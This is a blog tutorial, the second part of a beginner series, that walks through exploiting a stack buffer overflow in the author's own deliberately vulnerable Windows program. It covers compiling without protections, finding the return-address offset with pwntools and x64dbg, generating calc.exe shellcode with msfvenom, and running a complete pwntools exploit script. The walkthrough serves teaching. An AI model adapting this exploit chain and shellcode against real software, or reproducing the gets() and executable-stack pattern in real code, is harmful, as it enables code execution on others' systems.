Mirrai

Posted on Apr 1 • Edited on May 28

Buffer Overflows on x64 Windows: A Practical Beginners Guide (Part 2): Exploitation

#beginners #tutorial #infosec #security

Introduction

Welcome back. Mirrai here. In part 1 we covered the theory: the stack, RIP, and what a buffer overflow actually is. Now we get our hands dirty. By the end of this guide you should have a working exploit that gives you control of RIP and redirects execution to your own code.
Before we start, make sure you have x64dbg and pwntools installed from part 1. You'll also need the vulnerable program we wrote. If you haven't read part 1, go do that first. Buckle up, this might take a while.

For your convenience, here's the vulnerable program from part 1:

#include <stdio.h>
#include <windows.h>

int main() {
   setvbuf(stdout, NULL, _IONBF, 0);
   DWORD old_protect;
   char username[500] = {0};

   VirtualProtect(username, 500, PAGE_EXECUTE_READWRITE, &old_protect);

   printf("What is your username?: ");
   gets(username);
   printf("%s %s\n", "Hello", username);
}

Compilation

Before we can exploit anything we need to compile our vulnerable program with protections disabled. To be clear, buffer overflows are the first thing you learn in binary exploitation, and they can get complicated even without protections lol. But trust me, it gets easier from here.

Now, compile with these arguments from wherever you want:
gcc vuln.c -o vuln.exe -fno-stack-protector -no-pie

-fno-stack-protector disables stack canaries. Stack canaries work by placing a random value between your buffer and the return address. If that value has been modified by the time the function returns, the program is terminated. Fun fact: miners took canaries down into coal mines, and if the bird died it meant the air was unsafe. Same logic here. -no-pie disables position-independent executables so the binary loads at a consistent address every run, which makes our life significantly easier.
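
To make the canary idea a bit more concrete, here is a toy model in Python. It is only a sketch: the frame layout, the sizes, and the names make_frame, unsafe_copy and canary_intact are made up for illustration. A real compiler emits this check in the function epilogue, and the real layout depends on your compiler.

```python
import os

BUF_SIZE = 16     # toy buffer size (hypothetical, not the real 500)
CANARY_SIZE = 8   # the canary sits right after the buffer
RET_SIZE = 8      # the saved return address sits after the canary


def make_frame(canary: bytes, ret_addr: bytes) -> bytearray:
    """Lay out a fake frame as [buffer][canary][return address]."""
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(ret_addr)


def unsafe_copy(frame: bytearray, data: bytes) -> None:
    """Copy data into the buffer with no bounds check, like gets()."""
    data = data[:len(frame)]      # stay inside the toy frame
    frame[0:len(data)] = data


def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The check a protected function would do right before returning."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + CANARY_SIZE]) == canary


canary = os.urandom(CANARY_SIZE)
frame = make_frame(canary, (0x401000).to_bytes(RET_SIZE, "little"))

unsafe_copy(frame, b"A" * 10)   # fits inside the buffer
print("small input, canary intact:", canary_intact(frame, canary))

unsafe_copy(frame, b"A" * 32)   # runs over the canary and the return address
print("big input, canary intact:", canary_intact(frame, canary))
```

The point is that you can't reach the return address without trampling the canary first, which is why we turn it off for this tutorial.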

Loading the exe with x64dbg

Open x64dbg and just drag and drop the exe into it. You should see a screen like this.

The labeled buttons are what you'll use most. The first runs the program until a breakpoint is hit. The second steps through one instruction at a time and follows into function calls. The third does the same but steps over calls without entering them.

Finding Main

Now that we are in the debugger we need to find our program's main function. You might think that this is where we are starting from, but no. When you run a program, the OS loader and the runtime startup code do some setup before your main is called, so we need to tell this initialisation code apart from the main code.

Method 1: String search

Since we know the strings we used in our program, we can just find where they show up in the instruction list and find main that way. Press Shift + D to open a window that searches for your program's strings.

Here, if we double-click on any of the strings we used, like "Hello", "What is your username?: " or "%s %s\n", we will end up in main.

Method 2: Exit function (Gcc/Clang specific)

While researching I found that if you're using the C runtime, the function call right before the call to exit is your main. This seems to be how GCC arranges it, and it will probably be different in MSVC.

In the image above, main is the call before the exit function.

Generating the Cyclic Pattern

It's time to switch to Python. Create a Python file with this code:

from pwn import *
pattern = cyclic(600)
print(pattern)

This creates a pattern that will overwrite the return address. Store it, you're gonna need it later. Every 4-byte chunk of the pattern is unique, so from the bytes that end up in the return address we can find the distance, or offset, from the start of the buffer to the return address. Why do we need the offset, you may ask? Because we need to write exactly enough data to reach the memory location that holds the return address, so we can replace it with the start address of our buffer. Then, when ret executes, RIP is set to the buffer start address and whatever we wrote there gets executed.

Finding the return address

How do we actually find the return address? If you used method 2 to find main, the return address is the address of the instruction right after the call to main lol. If you used method 1, do not fret: set a breakpoint (F2) at the start of main (the push rbp instruction), restart the program with Ctrl + F2, then run until it stops at the breakpoint. The return address is the code pointer back into the calling function. At this breakpoint RSP points right at it, and it sits at the very bottom of main's stack allocation, meaning the highest address (remember the stack grows down).

Btw, that number (1 in my case) just above the return address (at the next higher address) is the number of arguments your program was run with. I recommend reading further on the full stack layout, such as the saved RBP, but we don't need it for this tutorial.

Overwriting the return address

Set a breakpoint at the instruction after the gets call. Now return to the console window of your program, which has been chilling in the background for a while, and paste the pattern you got from pwntools (only the letters, not the b'...' wrapper that print adds). Keep a note of which memory address the return address is stored at. Press Enter and you should see that the return address has been overwritten.

If the program crashes before reaching the breakpoint after gets, try reducing the size of the cyclic() pattern.

Here you can see the pattern 6661616B6661616A. Now I will process this value in pwntools:

print(cyclic_find(0x6661616B6661616A))

I got 536 although your number may differ depending on your environment and compiler.
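
If you're curious what cyclic() and cyclic_find() are doing under the hood, here is a rough pure-Python sketch. It assumes the pwntools defaults (lowercase alphabet, unique 4-byte chunks) and uses the textbook de Bruijn generator. The names cyclic_sketch and find_offset are mine, not pwntools API, so stick to the real functions in your exploit.

```python
import string
import struct
from itertools import islice


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every n-letter chunk appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_sketch(length, n=4):
    """First `length` bytes of the pattern (stand-in for pwntools' cyclic)."""
    letters = islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(letters).encode()


def find_offset(pattern, value):
    """Locate a 64-bit value as it lies in memory (little-endian) in the pattern."""
    needle = struct.pack("<Q", value)   # 0x6661616B6661616A -> b"jaafkaaf"
    return pattern.find(needle)


pattern = cyclic_sketch(600)
print(pattern[:20])                                # b'aaaabaaacaaadaaaeaaa'
print(find_offset(pattern, 0x6661616B6661616A))    # 536
```

Notice the value has to be turned back into little-endian bytes before searching, because that is the order the bytes sit in on the stack. That's why 6661616B6661616A in the debugger is really the text jaafkaaf.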

Getting the Shellcode

We need shellcode to execute once we control RIP. We'll use msfvenom to generate a payload that launches calc.exe.

msfvenom -p windows/x64/exec CMD=calc.exe -b "\x0a\x0d" -f python

The -b "\x0a\x0d" flag tells msfvenom to avoid bytes that would make gets() stop reading early. \x0a is newline and \x0d is carriage return, both of which would terminate input before the full payload is written. These are called bad chars: characters the input function won't read past. Typically null (0x00) is also a bad char, but gets() reads it fine.
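
msfvenom only cleans the shellcode, so it can be worth checking the rest of your payload (for example the packed return address) for bad chars yourself. Here is a small sketch of such a check. The helper name find_bad_bytes is hypothetical, and the default bad bytes are just the two used in this guide.

```python
def find_bad_bytes(payload, bad=b"\x0a\x0d"):
    """Return (offset, byte value) pairs for every bad byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


clean = b"\x48\x31\xc9\x48\x81\xe9"        # first bytes of the shellcode below
dirty = b"\x48\x31\x0a\xc9\x0d"            # made-up bytes with a newline and a CR

print(find_bad_bytes(clean))   # []
print(find_bad_bytes(dirty))   # [(2, 10), (4, 13)]
```

An empty list means gets() should read the whole thing. Anything else tells you the offset where the input would get cut off.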

Here's the full output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of python file: 1584 bytes
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x4d\x13\x13\x90\xd8"
buf += b"\xc5\xbe\x60\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\xb1\x5b\x90\x74\x28\x2d\x7e\x60\x4d"
buf += b"\x13\x52\xc1\x99\x95\xec\x31\x1b\x5b\x22\x42\xbd"
buf += b"\x8d\x35\x32\x2d\x5b\x98\xc2\xc0\x8d\x35\x32\x6d"
buf += b"\x5b\x98\xe2\x88\x8d\xb1\xd7\x07\x59\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x2f\x72\xec\xda\xe9\x9e\x21\x8c"
buf += b"\xda\x1e\xd1\xd9\x04\x5c\x8d\x1f\x52\x42\xd8\x53"
buf += b"\x97\x9e\xeb\x0f\x2f\x5b\x91\x08\x4e\x3e\xe8\x4d"
buf += b"\x13\x13\xd8\x5d\x05\xca\x07\x05\x12\xc3\xc0\x53"
buf += b"\x8d\xa6\x24\xc6\x53\x33\xd9\xd9\x15\x5d\x36\x05"
buf += b"\xec\xda\xd1\x53\xf1\x36\x28\x4c\xc5\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x52\xd2\x59\xd5\x84\xbf\xa1\x75"
buf += b"\xf3\x66\x61\x94\xc6\xf2\x44\x45\x56\x2a\x41\xad"
buf += b"\x1d\xe6\x24\xc6\x53\x37\xd9\xd9\x15\xd8\x21\xc6"
buf += b"\x1f\x5b\xd4\x53\x85\xa2\x29\x4c\xc3\x52\x1b\xdc"
buf += b"\x4d\xf6\x61\x9d\x52\x4b\xd1\x80\x9b\xe7\x3a\x0c"
buf += b"\x4b\x52\xc9\x99\x9f\xf6\xe3\xa1\x33\x52\xc2\x27"
buf += b"\x25\xe6\x21\x14\x49\x5b\x1b\xca\x2c\xe9\x9f\xb2"
buf += b"\xec\x4e\xd8\x62\xc4\xbe\x60\x4d\x13\x13\x90\xd8"
buf += b"\x8d\x33\xed\x4c\x12\x13\x90\x99\x7f\x8f\xeb\x22"
buf += b"\x94\xec\x45\x63\x35\x0b\xc2\x1b\x52\xa9\x36\x4d"
buf += b"\x78\x23\x9f\x98\x5b\x90\x54\xf0\xf9\xb8\x1c\x47"
buf += b"\x93\xe8\x70\xad\xc0\x05\x27\x5e\x61\x7c\xfa\xd8"
buf += b"\x9c\xff\xe9\x97\xec\xc6\xf3\xb9\xa9\xdd\x4e\x28"
buf += b"\x6b\x76\x90\xd8\xc5\xbe\x60"

Calculating the Buffer Start Address

We need to know where in memory our username buffer starts so we can point RIP at it.

Take the memory address where the return address is stored (not the value stored there), then subtract the offset from it to get the buffer's start address. In my case it's 0x00000000005FFC80, because 0x00000000005FFE98 - 536 = 0x00000000005FFC80.

buffer_start = return_address_location - offset
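
Here is the same arithmetic as a quick Python check, using the numbers from my machine (yours will differ). It also shows what the address looks like once it is packed as 8 little-endian bytes, which is the form that actually lands on the stack. I use struct from the standard library here; pwntools' p64 gives the same bytes with its default little-endian setting.

```python
import struct

return_address_location = 0x00000000005FFE98   # where the return address is stored (my session)
offset = 536                                   # what cyclic_find gave me

buffer_start = return_address_location - offset
print(hex(buffer_start))                       # 0x5ffc80

packed = struct.pack("<Q", buffer_start)       # 8 bytes, least significant byte first
print(packed.hex())                            # 80fc5f0000000000
```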

The Exploitation Code

Before running: replace buffer_size, ret_addr, and the buf shellcode with your own values. The addresses in this script are specific to my machine and will not work on yours. Use the offset and buffer start address you calculated in the previous steps.

import os

from pwn import *

vuln_bin = "vuln.exe"
stack_adj = b"\x48\x81\xec\x00\x04\x00\x00"
current_dir = os.path.dirname(__file__)

vuln_bin_path = os.path.join(current_dir, vuln_bin)

nop = b"\x90"
buffer_size = 536

ret_addr = p64(0x00000000005FFC80)

buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x4d\x13\x13\x90\xd8"
buf += b"\xc5\xbe\x60\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\xb1\x5b\x90\x74\x28\x2d\x7e\x60\x4d"
buf += b"\x13\x52\xc1\x99\x95\xec\x31\x1b\x5b\x22\x42\xbd"
buf += b"\x8d\x35\x32\x2d\x5b\x98\xc2\xc0\x8d\x35\x32\x6d"
buf += b"\x5b\x98\xe2\x88\x8d\xb1\xd7\x07\x59\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x2f\x72\xec\xda\xe9\x9e\x21\x8c"
buf += b"\xda\x1e\xd1\xd9\x04\x5c\x8d\x1f\x52\x42\xd8\x53"
buf += b"\x97\x9e\xeb\x0f\x2f\x5b\x91\x08\x4e\x3e\xe8\x4d"
buf += b"\x13\x13\xd8\x5d\x05\xca\x07\x05\x12\xc3\xc0\x53"
buf += b"\x8d\xa6\x24\xc6\x53\x33\xd9\xd9\x15\x5d\x36\x05"
buf += b"\xec\xda\xd1\x53\xf1\x36\x28\x4c\xc5\x5e\xa1\x11"
buf += b"\x8d\x8f\xa0\xe1\x52\xd2\x59\xd5\x84\xbf\xa1\x75"
buf += b"\xf3\x66\x61\x94\xc6\xf2\x44\x45\x56\x2a\x41\xad"
buf += b"\x1d\xe6\x24\xc6\x53\x37\xd9\xd9\x15\xd8\x21\xc6"
buf += b"\x1f\x5b\xd4\x53\x85\xa2\x29\x4c\xc3\x52\x1b\xdc"
buf += b"\x4d\xf6\x61\x9d\x52\x4b\xd1\x80\x9b\xe7\x3a\x0c"
buf += b"\x4b\x52\xc9\x99\x9f\xf6\xe3\xa1\x33\x52\xc2\x27"
buf += b"\x25\xe6\x21\x14\x49\x5b\x1b\xca\x2c\xe9\x9f\xb2"
buf += b"\xec\x4e\xd8\x62\xc4\xbe\x60\x4d\x13\x13\x90\xd8"
buf += b"\x8d\x33\xed\x4c\x12\x13\x90\x99\x7f\x8f\xeb\x22"
buf += b"\x94\xec\x45\x63\x35\x0b\xc2\x1b\x52\xa9\x36\x4d"
buf += b"\x78\x23\x9f\x98\x5b\x90\x54\xf0\xf9\xb8\x1c\x47"
buf += b"\x93\xe8\x70\xad\xc0\x05\x27\x5e\x61\x7c\xfa\xd8"
buf += b"\x9c\xff\xe9\x97\xec\xc6\xf3\xb9\xa9\xdd\x4e\x28"
buf += b"\x6b\x76\x90\xd8\xc5\xbe\x60"

payload = stack_adj + buf + nop * (buffer_size - len(buf) - len(stack_adj))  + ret_addr

p = process([vuln_bin_path])

input("debug pause press enter: ")

p.sendlineafter(b"What is your username?: ", payload)

p.wait()

Here's what this payload does at a high level:

stack_adj is the assembly instruction sub rsp, 0x400 encoded as raw bytes. When main returns, RSP ends up just above our shellcode. If the shellcode pushes anything, or any function it calls allocates stack space, that could overwrite our own code mid-execution. The stack adjustment moves RSP safely below the shellcode before anything else runs, giving it clean stack space to work with.
The shellcode follows immediately after the adjustment.

NOP bytes (\x90) pad the remaining space between the end of the shellcode and the return address. NOPs do nothing. In this layout they sit after the shellcode, so they are only filler that makes the payload reach exactly up to the return address. If you want a landing cushion in case your buffer address calculation is slightly off, put the NOPs at the front of the payload instead, so execution slides forward into the stack adjustment and the shellcode.
Finally, ret_addr overwrites the saved return address with the start of our buffer. When main returns, RIP loads this value and execution jumps to our stack adjustment followed by the shellcode.
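
If you want to sanity check the layout without launching anything, here is a small sketch that builds the same shape of payload with placeholder bytes and prints where each piece ends up. build_payload and fake_shellcode are hypothetical names for this check only, and the numbers are the ones from my machine.

```python
import struct


def build_payload(stack_adj, shellcode, offset, buffer_start):
    """Lay out [stack_adj][shellcode][NOP filler][return address]."""
    body = stack_adj + shellcode
    if len(body) > offset:
        raise ValueError("shellcode does not fit before the return address")
    filler = b"\x90" * (offset - len(body))
    return body + filler + struct.pack("<Q", buffer_start)


stack_adj = b"\x48\x81\xec\x00\x04\x00\x00"    # sub rsp, 0x400
fake_shellcode = b"\xcc" * 319                 # placeholder, same size as the msfvenom output
payload = build_payload(stack_adj, fake_shellcode, 536, 0x5FFC80)

# The last 4 bytes of stack_adj are the immediate, little-endian.
print(hex(struct.unpack("<I", stack_adj[3:])[0]))   # 0x400
print(len(payload))                                 # 544 = 536 + 8
print(payload[536:].hex())                          # 80fc5f0000000000
```

The return address has to start exactly at the offset. If len(payload) is not offset + 8, something in the padding math is off.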

If everything worked you'll see calc.exe pop open. If not, it's time to debug. I put input("debug pause press enter: ") in there for a reason lol. When you run the script and get to that prompt, press Alt+A in x64dbg to attach to your program. Once attached, press Enter in the script. Ideally you set a breakpoint right after gets has run, then you can examine the stack and the return address to see what's going on.

Btw I uploaded all files I used for this tutorial on my GitHub. Check it here

The End

That's a complete stack buffer overflow exploit on x64 Windows with protections disabled. We found the offset, controlled RIP, and redirected execution to shellcode we controlled.

Don't feel bad if it took a few tries to get working. It took me a few too lol. The pieces click once you see the whole chain working end to end.

Future parts, if I decide to make them, will cover the mitigations we removed here, such as stack canaries, ASLR, and DEP, and techniques to bypass them. Bye for now, and feel free to ask any questions if you're stuck somewhere. I'm always willing to help.
